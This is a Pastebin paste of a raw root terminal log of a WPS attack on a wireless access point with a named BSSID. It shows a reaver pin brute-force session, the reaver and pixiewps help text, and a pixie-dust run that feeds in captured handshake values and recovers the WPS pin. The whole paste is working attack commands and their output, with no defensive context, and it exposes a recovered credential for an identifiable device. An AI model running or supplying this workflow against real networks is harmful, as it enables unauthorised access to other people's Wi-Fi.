Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- [+] Trying pin 01231234.
- [+] Sending EAPOL START request
- [+] Received identity request
- [+] Sending identity response
- [P] E-Nonce: d2:7d:cf:e4:e2:ef:78:63:af:24:7e:25:93:73:26:1f
- [P] PKE: a6:fd:2d:26:aa:dc:8e:c3:67:15:3f:0e:98:61:f1:12:d6:a4:c3:fe:67:ae:c7:21:47:b5:e4:e7:39:22:2b:e8:4c:f7:35:07:65:4d:ac:9f:b9:6e:94:30:18:8e:c9:b3:30:5f:e6:b0:62:26:7c:96:37:ab:87:bf:71:cd:5c:01:ea:f9:32:15:cc:92:a2:be:68:50:f3:15:ce:d1:8c:71:8e:a8:f5:2e:59:71:69:83:43:a1:98:30:87:c8:77:d2:7b:4b:1e:79:5b:5b:68:df:2b:5c:06:6d:65:be:be:4a:64:07:b8:1f:a5:c0:5b:8b:95:28:ad:89:79:f3:a0:b5:e0:0e:31:5a:74:df:cc:e9:6f:8e:ec:78:f8:bb:d3:a1:82:df:3d:6e:65:20:59:6b:95:da:2b:36:64:aa:94:74:14:7b:9f:1a:ed:f9:12:e9:ce:8e:52:97:97:d0:52:21:f5:81:96:d9:67:2b:24:dc:a9:b0:e2:e9:01:58:ef:f7
- [P] WPS Manufacturer: Celeno Communication, Inc.
- [P] WPS Model Name: Celeno Wireless AP 2.4G
- [P] WPS Model Number: CL1800
- [P] Access Point Serial Number: 12345678
- [+] Received M1 message
- [P] R-Nonce: 70:98:5f:fa:f9:ea:61:1d:84:6a:1b:3b:80:7c:83:ad
- [P] PKR: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:02
- [P] AuthKey: 6c:5e:cf:cc:78:40:ee:87:55:8d:79:ad:78:ff:d8:84:65:70:a6:f7:29:cc:f1:af:50:06:e6:06:e9:b0:6e:95
- [+] Sending M2 message
- [P] E-Hash1: 8b:2f:57:ed:7b:9b:b7:35:ce:15:6a:d0:78:e8:c1:17:42:16:dd:96:25:9d:41:25:6a:b4:9e:7e:18:cb:61:ec
- [P] E-Hash2: eb:58:f4:dd:0a:86:7a:b8:eb:18:2e:c4:56:b2:34:7f:36:6c:45:e6:d9:00:a1:7b:cb:51:d6:e8:a5:1d:4d:1e
- [+] Received M3 message
- [+] Sending M4 message
- [+] Received WSC NACK
- [+] Sending WSC NACK
- [+] p1_index set to 3
- [+] Pin count advanced: 3. Max pin attempts: 20000
- [!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
- ^C[+] Session saved.
- root@pc9:~# reaver -i wlan0mon -S -vv -c 1 --bssid C0:AC:54:0A:3D:50 --help
- Reaver v1.5.2 WiFi Protected Setup Attack Tool
- Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
- mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212
- [+] Switching wlan0mon to channel 1
- Required Arguments:
- -i, --interface=<wlan> Name of the monitor-mode interface to use
- -b, --bssid=<mac> BSSID of the target AP
- Optional Arguments:
- -m, --mac=<mac> MAC of the host system
- -e, --essid=<ssid> ESSID of the target AP
- -c, --channel=<channel> Set the 802.11 channel for the interface (implies -f)
- -o, --out-file=<file> Send output to a log file [stdout]
- -s, --session=<file> Restore a previous session file
- -C, --exec=<command> Execute the supplied command upon successful pin recovery
- -D, --daemonize Daemonize reaver
- -a, --auto Auto detect the best advanced options for the target AP
- -f, --fixed Disable channel hopping
- -5, --5ghz Use 5GHz 802.11 channels
- -v, --verbose Display non-critical warnings (-vv for more)
- -q, --quiet Only display critical messages
- -K --pixie-dust=<number> [1] Run pixiewps with PKE, PKR, E-Hash1, E-Hash2 and E-Nonce (Ralink, Broadcom, Realtek)
- -Z, --no-auto-pass Do NOT run reaver to auto retrieve WPA password if Pixiewps attack is successful
- -h, --help Show help
- Advanced Options:
- -p, --pin=<wps pin> Use the specified 4 or 8 digit WPS pin
- -d, --delay=<seconds> Set the delay between pin attempts [1]
- -l, --lock-delay=<seconds> Set the time to wait if the AP locks WPS pin attempts [60]
- -g, --max-attempts=<num> Quit after num pin attempts
- -x, --fail-wait=<seconds> Set the time to sleep after 10 unexpected failures [0]
- -r, --recurring-delay=<x:y> Sleep for y seconds every x pin attempts
- -t, --timeout=<seconds> Set the receive timeout period [5]
- -T, --m57-timeout=<seconds> Set the M5/M7 timeout period [0.20]
- -A, --no-associate Do not associate with the AP (association must be done by another application)
- -N, --no-nacks Do not send NACK messages when out of order packets are received
- -S, --dh-small Use small DH keys to improve crack speed
- -L, --ignore-locks Ignore locked state reported by the target AP
- -E, --eap-terminate Terminate each WPS session with an EAP FAIL packet
- -n, --nack Target AP always sends a NACK [Auto]
- -w, --win7 Mimic a Windows 7 registrar [False]
- -X, --exhaustive Set exhaustive mode from the beginning of the session [False]
- -1, --p1-index Set initial array index for the first half of the pin [False]
- -2, --p2-index Set initial array index for the second half of the pin [False]
- -P, --pixiedust-loop Set into PixieLoop mode (doesn't send M4, and loops through to M3) [False]
- -W, --generate-pin Default Pin Generator by devttys0 team [1] Belkin [2] D-Link
- Example:
- reaver -i mon0 -b 00:90:4C:C1:AC:21 -vv -K 1
- root@pc9:~# pixiewps
- Pixiewps 1.1 WPS pixie dust attack tool
- Copyright (c) 2015, wiire <wi7ire@gmail.com>
- Usage: pixiewps <arguments>
- Required Arguments:
- -e, --pke : Enrollee public key
- -r, --pkr : Registrar public key
- -s, --e-hash1 : Enrollee Hash1
- -z, --e-hash2 : Enrollee Hash2
- -a, --authkey : Authentication session key
- Optional Arguments:
- -n, --e-nonce : Enrollee nonce (mode 2,3,4)
- -m, --r-nonce : Registrar nonce
- -b, --e-bssid : Enrollee BSSID
- -S, --dh-small : Small Diffie-Hellman keys (PKr not needed) [No]
- -f, --force : Bruteforce the whole keyspace (mode 4) [No]
- -v, --verbosity : Verbosity level 1-3, 1 is quietest [2]
- -h, --help : Display this usage screen
- Examples:
- pixiewps -e <pke> -r <pkr> -s <e-hash1> -z <e-hash2> -a <authkey> -n <e-nonce>
- pixiewps -e <pke> -s <e-hash1> -z <e-hash2> -a <authkey> -n <e-nonce> -S
- pixiewps -e <pke> -s <e-hash1> -z <e-hash2> -n <e-nonce> -m <r-nonce> -b <e-bssid> -S
- [!] Not all required arguments have been supplied!
- root@pc9:~# pixiewps -e a6:fd:2d:26:aa:dc:8e:c3:67:15:3f:0e:98:61:f1:12:d6:a4:c3:fe:67:ae:c7:21:47:b5:e4:e7:39:22:2b:e8:4c:f7:35:07:65:4d:ac:9f:b9:6e:94:30:18:8e:c9:b3:30:5f:e6:b0:62:26:7c:96:37:ab:87:bf:71:cd:5c:01:ea:f9:32:15:cc:92:a2:be:68:50:f3:15:ce:d1:8c:71:8e:a8:f5:2e:59:71:69:83:43:a1:98:30:87:c8:77:d2:7b:4b:1e:79:5b:5b:68:df:2b:5c:06:6d:65:be:be:4a:64:07:b8:1f:a5:c0:5b:8b:95:28:ad:89:79:f3:a0:b5:e0:0e:31:5a:74:df:cc:e9:6f:8e:ec:78:f8:bb:d3:a1:82:df:3d:6e:65:20:59:6b:95:da:2b:36:64:aa:94:74:14:7b:9f:1a:ed:f9:12:e9:ce:8e:52:97:97:d0:52:21:f5:81:96:d9:67:2b:24:dc:a9:b0:e2:e9:01:58:ef:f7 -r 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:02 -s 8b:2f:57:ed:7b:9b:b7:35:ce:15:6a:d0:78:e8:c1:17:42:16:dd:96:25:9d:41:25:6a:b4:9e:7e:18:cb:61:ec -z eb:58:f4:dd:0a:86:7a:b8:eb:18:2e:c4:56:b2:34:7f:36:6c:45:e6:d9:00:a1:7b:cb:51:d6:e8:a5:1d:4d:1e -a 6c:5e:cf:cc:78:40:ee:87:55:8d:79:ad:78:ff:d8:84:65:70:a6:f7:29:cc:f1:af:50:06:e6:06:e9:b0:6e:95 -n d2:7d:cf:e4:e2:ef:78:63:af:24:7e:25:93:73:26:1f
- Pixiewps 1.1
- [*] E-S1: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
- [*] E-S2: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
- [+] WPS pin: 06710569
- [*] Time taken: 0 s
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
